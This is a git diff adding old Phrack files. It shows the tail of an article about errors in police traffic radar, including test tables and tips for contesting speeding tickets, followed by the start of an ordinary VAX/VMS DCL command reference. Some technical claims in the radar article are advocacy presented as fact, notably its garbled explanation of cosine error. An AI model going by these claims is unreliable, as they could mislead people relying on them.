+:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
+BAND    : FREQUENCY    NOTE ABOUT SPECIFIC BAND
+:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
+X-Band  : 10.525 GHz   This is the frequency in which most RADAR units operate.
+K-Band  : 24.150 GHz   K-Band was developed to give a longer range of the beam.
+Ka-Band : 26.450 GHz   This bandwidth is primarily for use with RADAR units
+                       that are used for "photo-speed traps."
+:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
+
+"So if RADAR is so unreliable," you ask, "why don't we have planes crashing on
+a daily basis?"  In the first place, TRAFFIC RADAR operates on a COMPLETELY
+different basis than, say, the type of RADAR that tracks weather or airplanes.
+
+The technology of traffic RADAR can in no way be compared to the accuracy of
+other types of RADAR.  Traffic RADAR does NOT "sweep" like a regular RADAR.
+"Sweeping" means that the RADAR is picking up every single return signal it
+gets and plots them proportionally on a two-dimensional cathode ray tube.  On
+the other hand, traffic RADAR uses a stationary beam.  Also, traffic RADAR does
+not use a modulated beam like regular RADAR; it uses a constant beam.  ***This
+is an important distinction because this means that if there are multiple
+images, the constant RADAR beam cannot distinguish between them!***
+
+Furthermore, traffic RADAR is limited to things such as size.  It must be able
+to fit inside a patrol car and it is also subject to cost.  That means a
+municipality usually picks up the lowest bid it can get from various
+manufacturers.
+ ______________________________________________________________________________
+|                                 |
+| Implementation of Traffic RADAR |  It is important to note at this time that
+|_________________________________|  while government standards for accuracy
+                                     for military and commercial airline RADAR
+exist, traffic RADAR is NOT subject to ANY government standards whatsoever.  An
+attempt was made to do this by the police and two government agencies, but were
+refused any type of compliance with traffic speed RADAR manufacturers and the
+Reagan administration.
+
+In the late 1970s, there was wide-spread publicity of about RADAR errors,
+including the well known tree clocked at 86-MPH in Florida.  So, in 1979 the
+National Highway Safety Administration (NHSA) assigned to the National Bureau
+of Standards the task of testing all brands of traffic RADAR in use at that
+time for the purpose of discovering the source of these errors and proposing
+federal standards to eliminate them.  In January of 1981, the proposed
+standards were published in the Federal Register.  However, the Reagan
+administration took no action on the proposal (the last part of this file
+contains the profile from this report of various RADAR units).
+
+After THREE years of government inaction on the problem, the International
+Association of the Chief of Police (IACP) provided non-government standards by
+which all traffic RADAR units could be tested to assure accuracy:  Volume I of
+the standards was published in April, 1984 and Volume II in June, of 1984.
+
+In June of 1986, the traffic RADAR manufacturers announced the formation of
+their own trade association, saying that they would not submit traffic RADAR
+units for IACP testing!  Instead, they said they would use their own standards.
+
+So far, NO ONE has any idea of what these standards are; not the police, not
+the government and, most importantly, not the public!  Basically, there are no
+performance requirements or standards for traffic RADAR and the claims of
+86-MPH trees and 28-MPH houses cannot be refuted.
+ ______________________________________________________________________________
+|                             |
+| Common Traffic Radar Errors |  Below is a list of common errors and how they
+|_____________________________|  occur.  This is the part of the article that
+                                 must be used in conjunction with the previous
+file in this series.  You must attempt, while pleading your case, to tie in
+some of the following errors to the situation you found yourself in when you
+got your speeding ticket.  See Phrack #37 file #5 for details.
+
+"The Look-Past Error"   Even when the RADAR operator aims his gun properly, the
+RADAR is subject to this type of error.  This is caused by the RADAR reflecting
+off of a larger surface area in the background rather than the smaller
+reflective surface in the foreground.  Evidence of this the Look-Past Error was
+printed in the October 1979 issue of "Car and Driver."  The author measured the
+effectiveness of KR11 RADAR system against various vehicles.  The author showed
+that the typical sedan did not show up on the RADAR until it was less that 1200
+feet away, however, a Ford 9000 semi tractor trailer could be picked up at 7600
+feet.
+
+"The Road Sign Error"   Due to the reflectability of microwaves, road signs,
+buildings, billboards, large trees, and other stationary objects are a source
+of errors.
+
+"Radio Interference Error"   According to the Texas Department of Public
+Safety, "UHF frequencies broadcast today can force RADAR to read various
+numbers when transmitted within the area."  This type of interference could
+come from the radio within the patrol car, citizens band radio, or television
+stations.
+
+"Fan Interference Error"   When the antenna is mounted inside the patrol car,
+"RADAR will have the tendency to read the pulse of the fan motor (air
+conditioner, heater, defroster)."  This is a statement provided by the Texas
+Department of Public Safety who conducted a study of RADAR guns in 1987.  The
+Texas Department of Public Safety offered no safeguard for this error.
+
+"Beam Reflection Error"   Since microwaves are so readily reflected, the Texas
+Department of Public Safety cautioned mounting the antenna within the patrol
+car.  One instructor said, "It is possible that a reflective path can be set up
+through the rear view mirror that will produce RADAR readings on the vehicles
+behind the patrol car when the RADAR is aimed forward.  And those vehicles can
+be either coming or going since traffic RADAR cannot distinguish between the
+direction."
+
+"Double Bounce Error"   Again, since microwaves are easily reflected, the
+operator must be aware of a "bad bounce" and an ordinary reflection.  And, as
+stated before, since large objects are more efficient than smaller ones,
+microwaves are attracted to them more.  So, in effect, you could have an
+initial RADAR bounce off of the target vehicle, then from the target vehicle to
+a house or a truck going the opposite direction, and finally back to the patrol
+car.  This error will mathematically get larger the slower the target vehicle
+is moving.
+
+"The Cosine Error"   This is a mathematical error that takes place when the
+RADAR gun attempts to calculate the trigonomic equation that is programmed into
+it.  The RADAR gun measures the angle at which the target enters a point and
+then exits a point (i.e. 25 degrees).  The cosine of 25 is .9063.  The RADAR
+gun was designed to calculate the speed of the patrol car by multiplying the
+speed of the patrol car (i.e. 50 mph) and the cosine of the angle (.9063) and
+it gets the false speed of the patrol vehicle as 45mph.  Therefore, when you
+subtract the patrol speed from the target speed (i.e. 50, the same as the
+patrol car) you get the false sense that the target vehicle is traveling 5mph
+faster than the patrol car.
+ ______________________________________________________________________________
+|                           |
+| Technical Analysis Report |  Below is a copy of the report mentioned above
+|___________________________|  was conducted by the NHSA.  But first I will
+                               explain what some of the criteria were under the
+testing conditions.  It is also important to note that ALL RADAR units were
+subject to "panning error" except the CMI Speedgun-6 and Speedgun-8 models.
+Panning error occurs when the RADAR antenna is aimed at it's own display
+console.  Unintentional errors of this sort can be eliminated when police
+officers are given adequate training.
+
+TEST UNIT               : Model and manufacturer of the police speed RADAR
+                          unit in question.
+
+BAND                    : The short hand used for determining the broadcast
+                          frequency of the RADAR unit.  X-Band is 8.2-12.4 GHz.
+                          K-Band is 18.0-26.5 GHz.
+
+BEAM WIDTH              : The number that is 1/2 of the actual beam width.
+                          In other words, if a RADAR manufacturer says the beam
+                          width is 24 degrees, the actual beam width is
+                          48 degrees.  Very deceptive, eh?
+
+SHADOWING ERROR         : This occurs in moving mode only.  It is the result
+                          of the RADAR mistaking another vehicle for it's
+                          ground reference and adding speed to the target
+                          reading.
+
+POWER SURGE             : This occurs when the RADAR unit is first turned on.
+                          This also occurs when the "kill switch" is used to
+                          defeat RADAR detectors.  Lag time for kill in the
+                          moving mode ranges from 1.5-5 seconds.
+
+
+EXTERNAL INTERFERENCE   : The NBS test only used CB radio and police-band radio
+                          for "external interference."  There are many other
+                          kinds of outside electromagnetic interference that
+                          may effect police RADAR.
+
+INTERNAL INTERFERENCE   : Internal interference "may be caused by ANY
+                          electrical component or accessory in the vehicle,
+                          especially when the patrol car's primary power source
+                          is used to operate the RADAR.
+
+[It should be noted that TWO of MPH's K-55 RADAR units were tested.  This
+demonstrates that each RADAR unit can contain its own quirks regardless of the
+fact that it can be from the same model from the same manufacturer.]
+_______________________________________________________________________________
+
+             NATIONAL BUREAU OF STANDARDS SUMMARY ON TRAFFIC RADAR
+_______________________________________________________________________________
+
+TEST UNIT               BAND    BEAM WIDTH      SHADOWING ERROR
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Kustom Signals MR-9     K       13.3            Minor
+
+
+
+POWER SURGE                     EXTERNAL INTERF.           INTERNAL INTERF.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Switch-ON gave                  CB radio caused false      CB radio caused
+stray reading of 7mph           readings of up to 25'      erroneous readings
+_______________________________________________________________________________
+
+TEST UNIT               BAND    BEAM WIDTH      SHADOWING ERROR
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+MPH Industries K-55     X       20.4            Added 12mph to target in one
+(first of two units)                            test
+
+
+POWER SURGE                     EXTERNAL INTERF.           INTERNAL INTERF.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+No valid reading for            CB radio caused false      CB radio many
+2.4 sec in moving mode          readings of up to 20'      erroneous readings
+_______________________________________________________________________________
+
+TEST UNIT               BAND    BEAM WIDTH      SHADOWING ERROR
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+MPH Industries K-55     X       24.6            Increased target speed 12-15mph
+(second of two units)                           about 20% of the time
+
+
+POWER SURGE                     EXTERNAL INTERF.           INTERNAL INTERF.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+2 sec delay in moving mode,     CB radio caused false      CB radio cause many
+2.5 sec in stationary mode      alarms up to 175' away     erroneous readings
+_______________________________________________________________________________
+
+TEST UNIT               BAND    BEAM WIDTH      SHADOWING ERROR
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Decatur MV-715          X       17.5            Added 8-23mph to target in
+                                                repeated testing
+
+
+POWER SURGE                     EXTERNAL INTERF.           INTERNAL INTERF.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+No valid reading for            Not effected by external   Extreme interference
+2+ seconds in moving mode       CB radio                   from heater fan,
+                                                           ignition, & CB radio
+_______________________________________________________________________________
+
+TEST UNIT               BAND    BEAM WIDTH      SHADOWING ERROR
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+CMI Speedgun-6          X       18.8            Very severe, added 12-20 mph
+                                                to target
+
+POWER SURGE                     EXTERNAL INTERF.           INTERNAL INTERF.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+7 sec delay in moving mode,     Not effected by external   CB radio and police
+2 sec delay in stationary       CB radio                   radio boosts
+                                                           readings 20mph
+_____________________________________________________________________________
+
+TEST UNIT               BAND    BEAM WIDTH      SHADOWING ERROR
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+CMI Speedgun-8          X       18.6            target traveling 41mph shown as
+                                                74mph; target 30mph shown as
+                                                41mph
+
+POWER SURGE                     EXTERNAL INTERF.           INTERNAL INTERF.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+2 sec delay in moving mode,     Not effected by external   No adverse effect
+1.2 sec delay in stationary     CB radio                   noted
+_______________________________________________________________________________
+
+TEST UNIT               BAND    BEAM WIDTH      SHADOWING ERROR
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Kustom Signals MR-7     X       14.3            No effects noted
+
+
+POWER SURGE                     EXTERNAL INTERF.           INTERNAL INTERF.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+25.4 sec delay in moving mode,  Not effected by external   Police band radio
+0.6 sec delay in stationary     CB radio                   caused intermittent
+                                                           increases of 10mph
+ ______________________________________________________________________________
+|               |
+| In Closing... |  I hope you have learned a little about how police speed
+|_______________|  RADAR operates, the errors that they frequently incur, and
+                   possibly a way to avoid the highway robbery that occurs
+each time Officer Friendly decides to make a little extra dough for his "job
+security."
+
+Also, if you are interested in obtaining cheap traffic RADAR equipment to play
+with, you can write to:  AIS SATELLITE INC., 106 N. Seventh Street, Perkasie,
+PA 18944.  You can also call them for a catalog at (215)453-1400 or place
+orders at (800)AIS-2001.
+______________________________________________________________________________
diff --git a/phrack38/7.txt b/phrack38/7.txt
new file mode 100644
index 0000000..570c475
--- /dev/null
+++ b/phrack38/7.txt
@@ -0,0 +1,1538 @@
+                               == Phrack Inc. ==
+
+                 Volume Four, Issue Thirty-Eight, File 7 of 15
+
+      <:=--=:><:=--=:><:=--=:><:=--=:>\|/<:=--=:><:=--=:><:=--=:><:=--=:>
+      <:=--=:>                                                   <:=--=:>
+      <:=--=:>    >>>>>=-*  Users Guide to VAX/VMS  *-=<<<<<     <:=--=:>
+      <:=--=:>                                                   <:=--=:>
+      <:=--=:>                  Part III of III                  <:=--=:>
+      <:=--=:>                                                   <:=--=:>
+      <:=--=:>           Part E: DCL Command Reference           <:=--=:>
+      <:=--=:>         Part F: Lexical Function Reference        <:=--=:>
+      <:=--=:>                                                   <:=--=:>
+      <:=--=:>                    By Black Kat                   <:=--=:>
+      <:=--=:>                                                   <:=--=:>
+      <:=--=:><:=--=:><:=--=:><:=--=:>/|\<:=--=:><:=--=:><:=--=:><:=--=:>
+
+
+ Index
+ ~~~~~
+Part E contains information on DCL Command Reference
+Part F contains information on Lexical Function Reference
+
+
+                    <:=- Part E : DCL Command Reference -=:>
+
+
+ DCL Command Reference
+ ~~~~~~~~~~~~~~~~~~~~~
+@ file_spec [p1 p2...p8]
+  Executes a DCL command procedure.
+
+  Qualifier:
+  /OUTPUT=file_spec
+
+
+ACCOUNTING file_spec[,...]
+  Invokes the VAX/VMS Accounting Utility to collect and report accounting
+  information.
+
+  Qualifiers:
+  /ACCOUNT     /ADDRESS          /BEFORE        /BINARY       /ENTRY
+  /FULL        /IDENTIFICATION   /IMAGE         /JOB          /LOG
+  /NODE        /OUTPUT           /OWNER         /PRIORITY     /PROCESS
+  /QUEUE       /REJECTED         /REMOTE_ID     /REPORT       /SINCE
+  /SORT        /STATUS           /SUMMARY       /TERMINAL     /TITLE
+  /TYPE        /UIC              /USER
+
+
+ALLOCATE device_name: [logical_name]
+  Provides exclusive use of a device and, optionally, establishes a logical
+  name for that device.  While a device is allocated, other users may access
+  the device until you DEALLOCATE it or log out.
+
+  Qualifier:
+  /GENERIC
+
+
+ANALYZE
+  Invokes various VAX/VMS utilities to examine components of the system.  The
+  default function is to examine a module (ANALYZE/OBJECT).
+
+  Qualifiers:
+  /CRASH_DUMP   /DISK_STRUCTURE      /ERROR_LOG      /IMAGE
+  /MEDIA        /OBJECT              /PROCESS_DUMP   /RMS_FILE
+  /SYSTEM
+
+
+APPEND input_file_spec[,...] output_file_spec
+  Adds the contents of one or more input files to the end of a file.
+
+  Qualifiers:
+  /ALLOCATION    /BACKUP       /BEFORE         /BY_OWNER       /CONFIRM
+  /CONTIGUOUS    /CREATED      /EXCLUDE        /EXPIRED        /EXTENSION
+  /LOG           /MODIFIED     /NEW_VERSION    /READ_CHECK     /SINCE
+  /WRITE_CHECK
+
+
+ASSIGN
+  Equates a logical name to a physical device name, file specification or
+  another logical name.
+
+
+ASSIGN/MERGE
+  Merges the contents of one queue with another.
+
+
+ASSIGN/QUEUE
+  Assigns a logical queue to a device queue.
+
+
+ATTACH [process_name]
+  Enables you to transfer control from the current process to another process
+  created by you (see SPAWN).
+
+  Qualifier:
+  /IDENTIFICATION
+
+
+BACKUP input_spec output_spec
+  Invokes the VAX/VMS Backup Utility to perform one of the following file
+  operations:
+  o  Copy disk files.
+  o  Save disk files as a save set (a single data file) on a disk or
+     magnetic tape volume.
+  o  Restore files from a save set.
+  o  Compare files.
+  o  Display information about files contained in a save set.
+
+  Qualifiers:
+  /BACKUP          /BEFORE         /BLOCK_SIZE     /BRIEF
+  /BUFFER_COUNT    /COMMENT        /COMPARE        /CONFIRM
+  /CRC             /CREATED        /DELETE         /DENSITY
+  /EXCLUDE         /EXPIRED        /FAST           /FULL
+  /GROUP_SIZE      /IGNORE         /IMAGE          /INCREMENTAL
+  /INITIALIZE      /INTERCHANGE    /JOURNAL        /LABEL
+  /LIST            /LOG            /MODIFIED       /NEW_VERSION
+  /OVERLAY         /OWNER_UIC      /PHYSICAL       /PROTECTION
+  /RECORD          /REPLACE        /REWIND         /SAVE_SET
+  /SELECT          /SINCE          /TRUNCATE       /VERIFY
+  /VOLUME
+
+
+CALL label [p1 p2...p8]
+  Transfers command procedure control to a labeled subroutine in the procedure.
+
+  Qualifier:
+  /OUTPUT
+
+
+CANCEL [process_name]
+  Cancels a scheduled wake_up request for the specified process.
+
+  Qualifier:
+  /IDENTIFICATION
+
+
+CLOSE logical_name
+  Closes a file opened for input/output with the OPEN command, and deassigns
+  the logical name created for the file.
+
+  Qualifiers:
+  /ERROR        /LOG
+
+
+CONNECT virtual_terminal_name
+  Connects a physical terminal to a virtual terminal connected to another
+  process.
+
+  Qualifiers:
+  /CONTINUE     /LOGOUT
+
+
+CONTINUE
+  Resumes execution of a DCL command, program or command procedure
+  interrupted by pressing <Ctrl-Y> or <Ctrl-C>.  You can abbreviate the
+  CONTINUE command to the letter C.
+
+
+COPY input_file_spec[,...] output_file_spec
+  Creates a new file from one or more existing files.  The COPY command can be
+  used to:
+  o  Copy an input file to an output file, optionally changing its name and
+     location.
+  o  Copy a group of input files to a group of output files.
+  o  Concatenate two or more files into a single new file.
+
+  Qualifiers:
+  /ALLOCATION     /BACKUP        /BEFORE       /BY_OWNER     /CONCATENATE
+  /CONFIRM        /CONTIGUOUS    /CREATED      /EXCLUDE      /EXPIRED
+  /EXTENSION      /LOG           /MODIFIED     /OVERLAY      /PROTECTION
+  /READ_CHECK     /REPLACE       /SINCE        /TRUNCATE     /VOLUME
+  /WRITE_CHECK
+
+
+CREATE file_spec
+  Creates one or more sequential disk files from records that follow in the
+  input stream (i.e., the keyboard, a modem...).  To terminate input and close
+  the file, enter <Ctrl-Z>.
+
+  Qualifiers:
+  /LOG          /OWNER_UIC      /PROTECTION     /VOLUME
+
+
+CREATE/DIRECTORY directory_spec[,...]
+  Creates a new directory or subdirectory for cataloging files.
+
+  Qualifiers:
+  /LOG      /OWNER_UIC     /PROTECTION     /VERSION_LIMIT    /VOLUME
+
+
+CREATE/FDL=fdl_file_spec [file_spec]
+  Invokes the FDL (File Definition Language) Utility to use the
+  specifications in a definition file to create a new (empty) data file.
+
+  Qualifier:
+  /LOG
+
+
+DEALLOCATE device_name:
+  Releases a previously allocated device to the pool of available devices.
+
+  Qualifiers:
+  /ALL
+
+
+DEASSIGN logical_name[:]
+  Deletes logical name assignments made with the ALLOCATE, ASSIGN, DEFINE, or
+  MOUNT command.
+
+  Qualifiers:
+  /ALL          /EXECUTE_MODE           /GROUP          /JOB
+  /PROCESS      /SUPERVISOR_MODE        /SYSTEM         /TABLE
+  /USER_MODE
+
+
+DEASSIGN/QUEUE logical_queue_name[:]
+  Deassigns a logical queue from its printer or terminal queue assignment and
+  stops the associated logical queue.
+
+
+DEBUG
+  Invokes the VAX/VMS Debugger.
+
+
+DEFINE logical_name equivalence_name[,...]
+  Creates a logical name entry and assigns it an equivalence string, or a list
+  of equivalence strings, to the specified logical name.
+
+  Qualifiers:
+  /EXECUTIVE_MODE             /GROUP                /JOB
+  /LOG                        /NAME_ATTRIBUTES      /PROCESS
+  /SUPERVISOR_MODE            /SYSTEM               /TABLE
+  /TRANSLATION_ATTRIBUTES     /USER_MODE            /CHARACTERISTIC
+  /FORM                       /KEY
+
+
+DEFINE/KEY key_name string
+  Associates a character string and a set of attributes with a function key.
+
+  Qualifiers:
+  /ECHO         /ERASE          /IF_STATE       /LOCK_STATE     /LOG
+  /SET_STATE    /TERMINATE
+
+
+DELETE file_spec[,...]
+  Deletes one or more files from a mass device.
+
+  Qualifiers:
+  /BACKUP     /BEFORE      /BY_OWNER     /CONFIRM    /CREATED
+  /ERASE      /EXCLUDE     /EXPIRED      /LOG        /MODIFIED
+  /SINCE
+
+
+DELETE/CHARACTERISTIC characteristic_name
+  Deletes the definition of a queue characteristic that previously was
+  established with the DEFINE/CHARACTERISTIC command.
+
+
+DELETE/ENTRY=(queue_entry_number[,...]) queue_name[:]
+  Deletes one or more job entries from the named queue.
+
+
+DELETE/KEY key_name
+  Deletes a key definition established by the DEFINE/KEY command.
+
+  Qualifiers:
+  /ALL        /LOG        /STATE
+
+
+DELETE/QUEUE queue_name[:]
+  Deletes the specified queue from the system.
+
+
+DELETE/SYMBOL symbol_name
+  Removes a symbol definition from a local or global symbol table or removes
+  all symbol definitions in a symbol table.
+
+  Qualifiers:
+  /ALL       /GLOBAL       /LOCAL        /LOG
+
+
+DEPOSIT location=data[,...]
+  Over-writes the contents of a specified location or series of locations in
+  virtual memory.  The DEPOSIT and EXAMINE commands are used (mostly) while
+  debugging programs interactively.
+
+  Qualifiers:
+  /ASCII        /BYTE     /DECIMAL      /HEXADECIMAL
+  /LONGWORD     /OCTAL    /WORD
+
+
+DIFFERENCES master_file_spec [revision_file_spec]
+  Compares the contents of two disk files and creates a listing of those
+  records that do not match.
+
+  Qualifiers:
+  /CHANGE_BAR   /COMMENT_DELIMITER      /IGNORE
+  /MATCH        /MAXIMUM_DIFFERENCES    /MERGED
+  /MODE         /NUMBER                 /OUTPUT
+  /PARALLEL     /SEPARATED              /SLP
+  /WIDTH        /WINDOW
+
+
+DIRECTORY [file_spec[,...]]
+  Provides a list of files or information about a file or group of files.
+
+  Qualifiers:
+  /ACL          /BACKUP     /BEFORE         /BRIEF         /BY_OWNER
+  /COLUMNS      /CREATED    /DATE           /EXCLUDE       /EXPIRED
+  /FILE_ID      /FULL       /GRAND_TOTAL    /HEADING       /MODIFIED
+  /OUTPUT       /OWNER      /PRINTER        /PROTECTION    /SECURITY
+  /SELECT       /SINCE      /SIZE           /TOTAL         /TRAILING
+  /VERSIONS     /WIDTH
+
+
+DISCONNECT
+  Disconnects a physical terminal from a virtual terminal that has been
+  connected to a process.  The virtual terminal, and its associated process
+  will remain on the system when the physical terminal is disconnected from it.
+
+  Qualifier:
+  /CONTINUE
+
+
+DISMOUNT device_name[:]
+  Dismounts a disk or magnetic tape volume that previously was mounted with a
+  MOUNT command.
+
+  Qualifiers:
+  /ABORT      /CLUSTER      /UNIT     /UNLOAD
+
+
+DUMP file_spec[,...]
+  Displays the contents of files or volumes in ASCII, decimal, hexadecimal or
+  octal representation.
+
+  Qualifiers:
+  /ALLOCATED     /BLOCKS     /BYTE           /DECIMAL      /FILE_HEADER
+  /FORMATTED     /HEADER     /HEXADECIMAL    /LONGWORD     /NUMBER
+  /OCTAL         /OUTPUT     /PRINTER        /RECORDS      /WORD
+
+
+EDIT/ACL file_spec
+  Invokes the Access Control List Editor to create or update access control
+  list information for a specified object.
+
+  Qualifiers:
+  /JOURNAL      /KEEP     /MODE      /OBJECT     /RECOVER
+
+
+EDIT/EDT file_spec
+  Invokes the VAX/VMS EDT text editor.  The /EDT qualifier is not required, as
+  EDT is the default editor.
+
+  Qualifiers:
+  /COMMAND      /CREATE      /JOURNAL     /OUTPUT     /READ_ONLY
+  /RECOVER
+
+
+EDIT/FDL file_spec
+  Invokes the VAX/VMS FDL (File Definition Language) Editor to create or modify
+  File and FDL files.
+
+  Qualifiers:
+  /ANALYSIS       /CREATE           /DISPLAY        /EMPHASIS
+  /GRANULARITY    /NOINTERACTIVE    /NUMBER_KEYS    /OUTPUT
+  /PROMPTING      /RESPONSES        /SCRIPT
+
+
+EDIT/TPU file_spec
+  Invokes the VAX/VMS Text Processing Utility.  The EVE (Extensible VAX Editor)
+  is the default interface for TPU.  To invoke TPU with the EDT emulator
+  interface, define the logical TPUSECII to point to the section file for the
+  EDT interface as follows:
+  $ DEFINE  TPUSECINI  EDTSECINI
+
+  Qualifiers:
+  /COMMAND      /CREATE         /DISPLAY        /JOURNAL
+  /OUTPUT       /READ_ONLY      /RECOVER        /SECTION
+
+
+EOD
+  Signals the end of an input stream when a command, program or utility is
+  reading data from an input device other than a terminal.
+
+
+EXAMINE location[:location]
+  Displays the contents of virtual memory.
+
+  Qualifiers:
+  /ASCII        /BYTE        /DECIMAL       /HEXADECIMAL
+  /LONGWORD     /OCTAL       /WORD
+
+
+EXIT [status_code]
+  Terminates the current command procedure.  If the command procedure was
+  executed from within another command procedure, control will return to the
+  calling procedure.
+
+
+GOSUB label
+  Transfers command procedure control to a labeled subroutine.
+
+
+GOTO label
+  Transfers control to a labeled statement in a command procedure.
+
+
+HELP
+  Invokes the VAX/VMS Help Utility to display information about a VMS command
+  or topic.
+
+  Qualifiers:
+  /INSTRUCTIONS         /LIBLIST        /LIBRARY        /OUTPUT
+  /PAGE                 /PROMPT         /USERLIBRARY
+
+
+IF logical_expression THEN dcl_command
+  Tests the value of a logical expression and executes the command following
+  the THEN keyword if the test is true.
+
+
+INITIALIZE device_name[:] volume_label
+  Formats and writes a label on a mass storage volume.
+
+  Qualifiers:
+  /ACCESSED             /BADBLOCKS      /CLUSTER_SIZE     /DATA_CHECK
+  /DENSITY              /DIRECTORIES    /ERASE            /EXTENSION
+  /FILE_PROTECTION      /GROUP          /HEADERS          /HIGHWATER
+  /INDEX                /LABEL          /MAXIMUM_FILES    /OVERRIDE
+  /OWNER_UC             /PROTECTION     /SHARE            /STRUCTURE
+  /SYSTEM               /USER_NAME      /VERIFIED         /WINDOWS
+
+
+INITIALIZE/QUEUE queue_name[:]
+  Creates and initializes queues.  This command is used to create and assign
+  names and attributes to queues.  When creating a batch queue, the qualifier
+  /BATCH is required.
+
+  Qualifiers:
+  /BASE_PRIORITY      /BATCH              /BLOCK_LMIT     /CHARACTERISTICS
+  /CPUDEFAULT         /CPUMAXIMUM         /DEFAULT        /DISABLE_SWAPPING
+  /ENABLE_GENERIC     /FORM_MOUNTED       /GENERIC        /JOB_LIMIT
+  /LIBRARY            /ON                 /OWNER_UIC      /PROCESSOR
+  /PROTECTION         /RECORD_BLOCKING    /RETAIN         /SCHEDULE
+  /SEPARATE           /START              /TERMINAL       /WSDEFAULT
+  /WSEXTENT           /WSQUOTA
+
+
+INQUIRE symbol_name [prompt]
+  Provides interactive assignment of a value for a local or global symbol in a
+  command procedure.
+
+  Qualifiers:
+  /GLOBAL         /LOCAL        /PUNCTUATION
+
+
+LIBRARY library_file_spec [input_file_spec[,...]]
+  Invokes the VAX/VMS Librarian Utility to create, modify, or describe a macro,
+  object, help, text or shareable image library.
+
+  Qualifiers:
+  /BEFORE       /COMPRESS               /CREATE         /CROSS_REFERENCE
+  /DATA         /DELETE                 /EXTRACT        /FULL
+  /GLOBALS      /HELP                   /HISTORY        /INSERT
+  /LIST         /LOG                    /MACRO          /NAMES
+  /OBJECT       /ONLY                   /OUTPUT         /REMOVE
+  /REPLACE      /SELECTIVE_SEARCH       /SHARE          /SINCE
+  /SQUEEZE      /TEXT                   /WIDTH          /MODULE
+
+
+LINK file_spec[,...]
+  Invokes the VAX/VMS Linker to link object modules into a VMS program image.
+
+  Qualifiers:
+  /BRIEF                /CONTIGUOUS     /CROSS_REFERENCE        /DEBUG
+  /EXECUTABLE           /FULL           /HEADER                 /MAP
+  /IMAGE                /PROTECT        /SHAREABLE              /SYMBOL_TABLE
+  /SYSLIB               /SYSSHR         /SYSTEM                 /TRACEBACK
+  /USERLIBRARY          /INCLUDE        /LIBRARY                /OPTIONS
+  /SELECTIVE_SEARCH     /SHAREABLE
+
+
+LOGOUT
+  Terminates an interactive terminal session with VMS.
+
+  Qualifiers:
+  /BRIEF       /FULL       /HANGUP
+
+
+MACRO file_spec[,...]
+  Invokes the VAX/VMS MACRO assembler to assemble MACRO assembly language
+  source programs.
+
+  Qualifiers:
+  /CROSS_REFERENCE      /DEBUG          /DISABLE        /ENABLE
+  /LIBRARY              /LIST           /OBJECT         /SHOW
+  /UPDATE
+
+
+MAIL [file_spec] [recipient_name]
+  Invokes the VAX/VMS Personal Mail Utility, which is used to send messages to,
+  and receive messages from, other users of the system.
+
+  Qualifiers:
+  /SUBJECT      /EDIT     /SELF
+
+
+MERGE input_file_spec1,input_file_spec2[,...] output_file_spec
+  Invokes the VAX/VMS Sort Utility to combine up to 10 similarly sorted input
+  files.  The input files to be merged must be in sorted order before invoking
+  MERGE.
+
+  Qualifiers:
+  /CHECK_SEQUENCE       /COLLATING_SEQUENCE     /DUPLICATES
+  /KEY                  /SPECIFICATION          /STABLE
+  /STATISTICS           /FORMAT                 /ALLOCATION
+  /BUCKET_SIZE          /CONTIGUOUS             /FORMAT
+  /INDEXED_SEQUENTIAL   /OVERLAY                /RELATIVE
+  /SEQUENTIAL
+
+
+MESSAGE file_spec[,...]
+  Invokes the VAX/VMS Message Utility to compile message definition files.
+
+  Qualifiers:
+  /FILE_NAME    /LIST   /OBJECT    /SYMBOLS     /TEXT
+
+
+MONITOR [class_name[,...]]
+  Invokes the VAX/VMS Monitor Utility to monitor various classes of system
+  performance data.  Data can be analyzed from a running system or from a
+  previously created recording file.  You can execute a single MONITOR request,
+  or enter MONITOR interactive mode to execute a number of requests.  The
+  interactive mode is entered by entering the MONITOR command with no
+  parameters or qualifiers.  A MONITOR request is terminated by entering
+  <Ctrl-C> or <Ctrl-Z>.  Pressing <Ctrl-C> causes MONITOR to enter interactive
+  mode, while <Ctrl-Z> returns control to DCL.
+
+  Parameters:
+  ALL_CLASSES           CLUSTER         DECNET
+  DISK                  DLOCK           FCP
+  FILE_SYSTEM_CACHE     IO              LOCK
+  MODES                 PAGE            POOL
+  PROCESSES             SCS             STATES
+  SYSTEM
+
+  Qualifiers:
+  /BEGINNING            /BY_NODE        /COMMENT
+  /DISPLAY              /ENDING         /FLUSH_INTERVAL
+  /INPUT                /INTERVAL       /NODE
+  /RECORD               /SUMMARY        /VIEWING_TIME
+
+  Class Name Qualifiers:
+  /ALL                  /AVERAGE        /CPU
+  /CURRENT              /ITEM           /MAXIMUM
+  /MINIMUM              /PERCENT        /TOPBIO
+  /TOPCPU               /TOPDIO         /TOPFAULT
+
+
+MOUNT device_name[:][,...] [volume_label[,...]] [logical_name[:]]
+  Invokes the VAX/VMS Mount Utility to make a disk or tape volume available for
+  use.
+
+  Qualifiers:
+  /ASSIST               /ACCESSED               /AUTOMATIC
+  /BIND                 /BLOCKSIZE              /CACHE
+  /CLUSTER              /COMMENT                /CONFIRM
+  /COPY                 /DATA_CHECK             /DENSITY
+  /EXTENSION            /FOREIGN                /GROUP
+  /HDR3                 /INITIALIZE             /LABEL
+  /MESSAGE              /MOUNT_VERIFICATION     /OVERRIDE
